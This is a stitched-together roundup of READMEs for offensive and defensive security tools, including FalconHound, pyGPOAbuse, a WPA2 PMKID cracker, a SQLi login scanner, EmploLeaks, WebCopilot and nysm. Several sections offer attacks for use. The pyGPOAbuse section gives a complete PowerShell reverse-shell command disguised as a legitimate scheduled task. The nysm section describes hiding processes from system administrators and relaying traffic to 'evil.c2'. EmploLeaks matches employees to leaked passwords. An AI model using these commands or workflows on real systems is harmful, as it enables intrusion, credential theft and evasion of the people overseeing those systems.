MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
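Conceptually, for each result row FalconHound binds those values and runs the action's Cypher. A minimal sketch of the equivalent with the official neo4j Python driver (URI, credentials and the row values are illustrative, not FalconHound's actual code):
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "bloodhound"))

cypher = (
    "MATCH (x:Computer {name:$Computer}) "
    "MATCH (y:User {objectid:$TargetUserSid}) "
    "MERGE (x)-[r:HasSession]->(y) "
    "SET r.since=$Timestamp SET r.source='falconhound'"
)

# One query-result row, already mapped through the Parameters section above.
row = {
    "Computer": "WS01.CONTOSO.LOCAL",
    "TargetUserSid": "S-1-5-21-1111111111-222222222-333333333-1105",
    "Timestamp": "2023-09-01T12:00:00Z",
}

with driver.session() as session:
    session.run(cypher, **row)
driver.close()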
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is another reason query output needs to be controlled; you might otherwise flood your target.
- Name: Sentinel
Enabled: true
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
- Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true
The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist. The SearchKey field is the column that will be used as the search key. The Overwrite field determines whether the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
Enabled: true
Like Sentinel, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
Enabled: true
Table: "name"
Once a session has ended, it would have to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is converted into a HadSession relationship between the computer and the user. The relationship will have the following properties:
{
  "till": "2021-08-31T14:00:00Z",
  "source": "falconhound",
  "reason": "logoff"
}
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
FalconHound will add the following properties to nodes in the graph:
Computer:
- 'exploitable': true/false
- 'exploits': list of CVEs
- 'exposed': true/false
- 'ports': list of ports accessible from the internet
- 'alertids': list of alert ids
The currently supported ways of providing FalconHound with credentials are:
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.
The required permissions for your AppID/AppSecret are listed here.
A more secure way of storing the credentials is to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Keyvault. This role only allows access to the secrets, not even the ability to list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository
Once configured, you can add the -keyvault parameter when starting FalconHound. When the -keyvault parameter is set on the command line, the Key Vault becomes the primary source for all required secrets. Should FalconHound fail to retrieve an item, it falls back to the equivalent item in config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement the collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
Python partial implementation of SharpGPOAbuse by @pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users and computers. It will create an immediate scheduled task, running as SYSTEM on the remote computer for a computer GPO, or as the logged-in user for a user GPO.
Default behavior adds a local administrator.
Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
**You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all, but many still need HTTPS.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
The tool suite has three parts, written in Go:
Scrape - a LIVE running tool to inspect the ranges for a keyword in SSL certs' CN and SAN fields in real time.
Store - a tool to retrieve IPs' certs and download all their Orgs, CNs, and SANs, so you can have your OWN crt.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
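Conceptually, the scrape step is a TLS handshake plus a read of the certificate's subject and SAN entries. A minimal Python sketch of that idea (using the cryptography package; the IP below is a placeholder, and CloudRecon itself is Go and far more concurrent):
import ssl

from cryptography import x509
from cryptography.x509.oid import NameOID

def grab_cert_names(ip: str, port: int = 443):
    # Fetch the peer certificate without validating it; we only want its fields.
    pem = ssl.get_server_certificate((ip, port))
    cert = x509.load_pem_x509_certificate(pem.encode())
    org = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.ORGANIZATION_NAME)]
    cn = [a.value for a in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        san = cert.extensions.get_extension_for_class(
            x509.SubjectAlternativeName
        ).value.get_values_for_type(x509.DNSName)
    except x509.ExtensionNotFound:
        san = []
    return org, cn, san

print(grab_cert_names("203.0.113.10"))  # replace with a real target IP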
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
RETR
retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac and pmkid must be hex strings, e.g. b8621f50edd9
The two main formulas to obtain a PMKID are as follows. This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
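Since the formula images do not reproduce here: the standard WPA2 construction is PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes) and PMKID = HMAC-SHA1(PMK, "PMK Name" || AP_MAC || STA_MAC) truncated to 16 bytes. A short Python sketch of the same computation (the tool's internals may differ in detail):
import hashlib
import hmac

def pmkid_for(passphrase: str, ssid: str, ap_mac: str, sta_mac: str) -> str:
    # PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # PMKID = HMAC-SHA1(PMK, "PMK Name" + AP_MAC + STA_MAC)[:16]
    msg = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(sta_mac)
    return hmac.new(pmk, msg, hashlib.sha1).digest()[:16].hex()

# Cracking is recomputing this per wordlist candidate and comparing:
captured = "2af8f29d27bd1a579743fbc2ab3f32c1"  # placeholder PMKID
if pmkid_for("password123", "HomeWiFi", "b8621f50edd9", "00c0cab6090c") == captured:
    print("[+] PSK found: password123")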
Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark. (You may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below; the manual way is for understanding.) Put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools, then connect to the AP using an invalid password to capture the EAPOL message 1 handshake. Follow the next three steps to obtain the fields needed for the arguments.
Open the pcap in Wireshark and apply the filter wlan_rsna_eapol.keydes.msgnr == 1 to display only EAPOL message 1 packets. If the access point is vulnerable, you should see the PMKID value like in the screenshot below:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Zero-dollar attack surface management tool, featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.
Easy EASM is just that... the easiest-to-set-up tool to give your organization visibility into its external-facing assets.
The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.
With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.
go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest
The tool expects a configuration file named config.yml to be in the directory you are running from. Here is an example of this YAML file:
# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100
To run the tool, fill out the config file config.yml, then run the easyeasm module:
./easyeasm
After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!
The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.
The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.
The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.
Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.
By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.
This project is licensed under the MIT License - see the LICENSE.md for details.
For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.
A powerful sensor tool to discover login panels and perform POST-form SQLi scanning.
Features:
- The script is super fast at scanning many URLs
- A quick tutorial & screenshots are shown at the bottom
- Project contribution tips are at the bottom
Installation
git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh
Dependencies
1. Multiple hosts scanning to detect login panels
python3 logsensor.py -f <subdomains-list>
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login
2. Targeted SQLi form scanning
python logsensor.py -u www.example.com/login --sqli
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email
View help
python logsensor.py --help
usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]
optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit
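To illustrate the login-panel detection idea (a conceptual sketch, not Logsensor's actual code): fetch a URL and flag it when the page contains a form with a password input, using requests and BeautifulSoup. The target URL is a placeholder:
import requests
from bs4 import BeautifulSoup

# Placeholder target; Logsensor additionally threads this across a host list.
resp = requests.get("http://www.example.com/login", timeout=10)
soup = BeautifulSoup(resp.text, "html.parser")

for form in soup.find_all("form"):
    if form.find("input", {"type": "password"}):
        print("[+] Login panel found:", resp.url)
        break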
TODO
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:
cd cli
python3 -m pip install psycopg2-binary
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
___________ .__ .__ __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/
OSINT tool to chain multiple APIs
emploleaks>
Right now, the tool supports two functionalities:
First, you must set the plugin to use, which in this case is linkedin. Afterwards, set your authentication tokens and then run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:
Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session in the browser. You can use the Web Developer Tools to get them: just sign in normally at LinkedIn, right-click and choose Inspect, and the cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
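A hedged sketch of that lookup step with psycopg2 (the table and column names of the indexed COMB schema are assumptions, as are the connection details, which mirror the example above):
import psycopg2

conn = psycopg2.connect(host="1.2.3.4", dbname="mydbname",
                        user="myuser", password="mypass123")
cur = conn.cursor()

# Emails gathered in the LinkedIn phase; placeholder value here.
for email in ["jdoe@example.com"]:
    cur.execute("SELECT email, password FROM leaks WHERE email = %s", (email,))
    for leaked_email, leaked_password in cur.fetchall():
        print(f"[!] {leaked_email} appears in a leak: {leaked_password}")

conn.close()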
An important aspect of this project is the use of the indexed COMB database; to build your version you need to download the torrent first. Be careful, because the files plus the indexed version require at least 400 GB of available disk space.
Once the torrent has completely downloaded, you will get a folder structure like the following:
├── count_total.sh
├── data
│   ├── 0
│   ├── 1
│   │   ├── 0
│   │   ├── 1
│   │   ├── 2
│   │   ├── 3
│   │   ├── 4
│   │   ├── 5
│   │   ├── 6
│   │   ├── 7
│   │   ├── 8
│   │   ├── 9
│   │   ├── a
│   │   ├── b
│   │   ├── c
│   │   ├── d
│   │   ├── e
│   │   ├── f
│   │   ├── g
│   │   ├── h
│   │   ├── i
│   │   ├── j
│   │   ├── k
│   │   ├── l
│   │   ├── m
│   │   ├── n
│   │   ├── o
│   │   ├── p
│   │   ├── q
│   │   ├── r
│   │   ├── s
│   │   ├── symbols
│   │   ├── t
At this point, you could import all those files with the create_db command:
We are integrating other public sites and applications that may offer information about a leaked credential. We may not be able to see the plaintext password, but it will give insight into whether the user has any compromised credentials:
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Or you can DM @pastacls or @gaaabifranco on Twitter.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.
The script first enumerates all subdomains of the given target domain using assetfinder, sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt.sh, then performs active subdomain enumeration using gobuster with a SecLists wordlist. It filters out the live subdomains using dnsx, extracts titles of the subdomains using httpx, and scans for subdomain takeover using subjack. It then uses gauplus & waybackurls to crawl all endpoints of the discovered subdomains, uses gf patterns to filter out xss, lfi, ssrf, sqli, open-redirect & rce parameters, and scans for vulnerabilities on the subdomains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Finally, it prints out the results of the scan and saves all output in a specified directory.
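A rough Python sketch of the passive half of that pipeline, chaining subfinder into dnsx and httpx via stdin (the flags shown are real but minimal; assumes the binaries are on PATH, and WebCopilot itself orchestrates many more tools):
import subprocess

domain = "bugcrowd.com"

# Passive subdomain enumeration.
subs = subprocess.run(["subfinder", "-d", domain, "-silent"],
                      capture_output=True, text=True).stdout
# Keep only subdomains that resolve.
alive = subprocess.run(["dnsx", "-silent"], input=subs,
                       capture_output=True, text=True).stdout
# Probe HTTP(S) and grab page titles.
titles = subprocess.run(["httpx", "-silent", "-title"], input=alive,
                        capture_output=True, text=True).stdout
print(titles)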
g!2m0:~ webcopilot -h
βββββββββββββββββ
ββββββββββββββββββ
ββββββββββββββββββββββ
ββββββββββββ¬βββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββββββββββ
[β] @h4r5h1t.hrs | G!2m0
Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]
Flags:
-d Add your target [Required]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message
Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server
WebCopilot requires git to install successfully. Run the following command as root to install webcopilot:
git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh
SubFinder β’ Sublist3r β’ Findomain β’ gf β’ OpenRedireX β’ dnsx β’ sqlmap β’ gobuster β’ assetfinder β’ httpx β’ kxss β’ qsreplace β’ Nuclei β’ dalfox β’ anew β’ jq β’ aquatone β’ urldedupe β’ Amass β’ gauplus β’ waybackurls β’ crlfuzz
To run the tool on a target, just use the following command.
g!2m0:~ webcopilot -d bugcrowd.com
The -o flag can be used to specify an output directory.
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
The -s flag can be used to run only subdomain enumeration (active + passive, also grabbing titles & screenshots).
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s
The -t flag can be used to add threads to your scan for faster results.
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333
The -b flag can be used for blind XSS (OOB); you can get your server from xsshunter or interact.
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss
The -x flag can be used to exclude out-of-scope domains.
g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss
Default options look like this:
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
βββββββββββββββββ
ββββββββββββββββββ
ββββββββββββββββββββββ
ββββββββββββ¬βββββββββββ
βββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββ βββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ ββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββ
[β] @h4r5h1t.hrs | G!2m0
[β] Warning: Use with caution. You are responsible for your own actions.
[β] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.
Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00
[!] Please wait while scanning...
[β] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[β] Subdoamin Scanned - [assetfinderβ] Subdomain Found: 34
[β] Subdoamin Scanned - [sublist3rβ] Subdomain Found: 29
[β] Subdoamin Scanned - [subfinderβ] Subdomain Found: 54
[β] Subdoamin Scanned - [amassβ] Subdomain Found: 43
[β] Subdoamin Scanned - [findomainβ] Subdomain Found: 27
[β] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[β] Active Subdoamin Scanned - [gobusterβ] Subdomain Found: 11
[β] Active Subdoamin Scanned - [amassβ] Subdomain Found: 0
[β] Subdomain Scanning: Filtering out of scope subdomains
[β] Subdomain Scanning: Filtering Alive subdomains
[β] Subdomain Scanning: Getting titles of valid subdomains
[β] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/
[β] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30
[β] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[β] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[β] Vulnerabilities Scanned - [XSSβ] Found: 0
[β] Vulnerabilities Scanned - [SQLiβ] Found: 0
[β] Vulnerabilities Scanned - [LFIβ] Found: 0
[β] Vulnerabilities Scanned - [CRLFβ] Found: 0
[β] Vulnerabilities Scanned - [SSRFβ] Found: 0
[β] Vulnerabilities Scanned - [Sensitive Dataβ] Found: 0
[β] Vulnerabilities Scanned - [Open redirectβ] Found: 0
[β] Vulnerabilities Scanned - [Subdomain Takeoverβ] Found: 0
[β] Vulnerabilities Scanned - [Nuclieβ] Found: 0
[β] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/
βββββ βββ βββ ββββ βββ βββββ
βββββ βββ βββ ββββ βββ βββββ
βββββ βββ βββ ββββ βββ βββββ
[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0
WebCopilot is inspired by Garud & Pinaak by ROX4R.
@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R
Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. Please use it with caution, because you are responsible for your own actions.
A stealth post-exploitation container.
With the rise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:
All these tools go blind to what goes through nysm. It hides:
Warning: This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y
cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
cd ./nysm/src/
make
nysm is a simple program to run before the intended command:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
Run a hidden bash:
./nysm bash
Run a hidden ssh and remove ./nysm:
./nysm -r ssh user@domain
Run a hidden socat as a daemon and remove ./nysm:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.
To differentiate nysm events from the others, everything runs inside a separate PID namespace.
bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.
